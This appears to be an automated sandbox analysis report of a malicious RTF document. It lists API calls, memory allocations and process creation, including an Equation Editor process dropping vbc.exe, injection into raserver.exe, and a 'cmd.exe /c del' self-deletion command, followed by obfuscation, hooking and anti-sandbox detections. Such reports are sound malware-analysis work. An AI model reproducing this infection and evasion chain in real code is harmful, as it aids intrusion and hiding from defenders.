            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A52305
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A9A37B
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A57353
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A85485
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A61489
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AD443E
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A8D47D
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AD05E3
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A6C5F0
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A5351F
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A96540
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A54680
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A5E6C1
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AF2622
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A9A634
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A5C7BC
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AD579A
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A857C3
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AEF8EE
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00ACF8C4
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A7286D
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A5C85C
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A529B2
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AF098E
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A669FE
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AD394B
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AD5955
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00B03A83
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AFCBA4
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AD6BCB
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A4FBD7
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00ADDBDA
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A77B00
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AEFDDD
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A80D3B
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A5CD5B
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A82E2F
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A6EE4C
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AECFB1
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AC2FDC
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A60F3F
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A7DF7C
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0109A035
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ECE0C6
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F4D06D
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ED3040
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EE905A
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EFD005
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ECF3CF
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EF63DB
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F763BF
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F1A37B
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ED7353
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ED2305
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ECE2E9
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F71238
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F505E3
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EEC5F0
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F16540
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ED351F
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EE1489
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F05485
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F0D47D
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F5443E
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F057C3
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EDC7BC
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F5579A
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EDE6C1
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ED4680
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F1A634
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F72622
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EE69FE
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ED29B2
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F7098E
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F55955
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F5394B
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F6F8EE
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F4F8C4
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EF286D
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EDC85C
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F5DBDA
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ECFBD7
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F7CBA4
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EF7B00
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F83A83
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F6FDDD
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EDCD5B
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F00D3B
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F42FDC
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F6CFB1
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EFDF7C
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EE0F3F
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EEEE4C
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01F02E2F
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DE4E9
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DE59C
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DD5A3
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DDB58
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000C2D89
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000C2D90
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DEDAD
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DDE45
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000C9E5C
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000C9E60
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000C2FB0
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01ECDF5C appears 121 times
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F3F970 appears 84 times
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01ECE2A8 appears 38 times
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F1373B appears 245 times
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F13F92 appears 132 times
            Source: C:\Users\Public\vbc.exe | Code function: String function: 00A4DF5C appears 123 times
            Source: C:\Users\Public\vbc.exe | Code function: String function: 00A9373B appears 245 times
            Source: C:\Users\Public\vbc.exe | Code function: String function: 00A93F92 appears 132 times
            Source: C:\Users\Public\vbc.exe | Code function: String function: 00ABF970 appears 84 times
            Source: C:\Users\Public\vbc.exe | Code function: String function: 00A4E2A8 appears 41 times
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041A360 NtCreateFile,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041A410 NtReadFile,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041A490 NtClose,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041A540 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041A40A NtReadFile,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041A53C NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A400C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A40078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A410D0 NtOpenProcessToken,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A40060 NtQuerySection,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A401D4 NtSetValueKey,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A4010C NtOpenDirectoryObject,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A41148 NtOpenThread,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A407AC NtCreateMutant,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3F8CC NtWaitForSingleObject,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A41930 NtSetContextThread,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3F938 NtWriteFile,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FAB8 NtQueryValueKey,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FA20 NtQueryInformationFile,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FA50 NtEnumerateValueKey,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FBE8 NtQueryVirtualMemory,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FB50 NtCreateKey,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FC30 NtOpenProcess,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A40C40 NtGetContextThread,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FC48 NtSetInformationFile,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A41D80 NtSuspendThread,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FD5C NtEnumerateKey,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FE24 NtWriteVirtualMemory,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FFFC NtCreateProcessEx,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A3FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC00C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC07AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBF9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBF900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFAB8 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC01D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC1148 NtOpenThread,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC10D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC0060 NtQuerySection,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC0078 NtResumeThread,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC0048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBF938 NtWriteFile,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC1930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBF8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC1D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EC0C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01EBFE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DA360 NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DA410 NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DA490 NtClose,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DA540 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DA40A NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DA53C NtAllocateVirtualMemory,
            Source: vbc[1].exe.1.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: vbc.exe.1.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe | Memory allocated: 76F90000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe | Memory allocated: 76E90000 page execute and read and write
            Source: vbc[1].exe.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 3nkW4MtwSD.rtf | Virustotal: Detection: 56%
            Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$kW4MtwSD.rtf
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCC24.tmp
            Source: classification engine | Classification label: mal100.troj.expl.evad.winRTF@10/9@3/2
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
            Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
            Source: Binary string: RAServer.pdb source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: vbc[1].exe.1.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: vbc.exe.1.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.2.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.3.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.10.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.4.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.8.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.2.vbc.exe.1090000.5.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.2.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.6.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041685A push C1F93286h; ret
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041D4B5 push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041D56C push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041D502 push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041D50B push eax; ret
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041660F push ss; retf
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040B75A push esp; retf
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A4DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_01ECDFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DD4B5 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DD50B push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DD502 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000DD56C push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000D660F push ss; retf
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000CB75A push esp; retf
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_000D685A push C1F93286h; ret
            Source: initial sample | Static PE information: section name: .text entropy: 7.77893217222
            Source: initial sample | Static PE information: section name: .text entropy: 7.77893217222
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

            Boot Survival:

            Drops PE files to the user root directory
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (reported 51 times)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (reported 8 times)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX (reported 27 times)
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

Yara detected AntiVM3
            Source: Yara matchFile source: 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2652, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
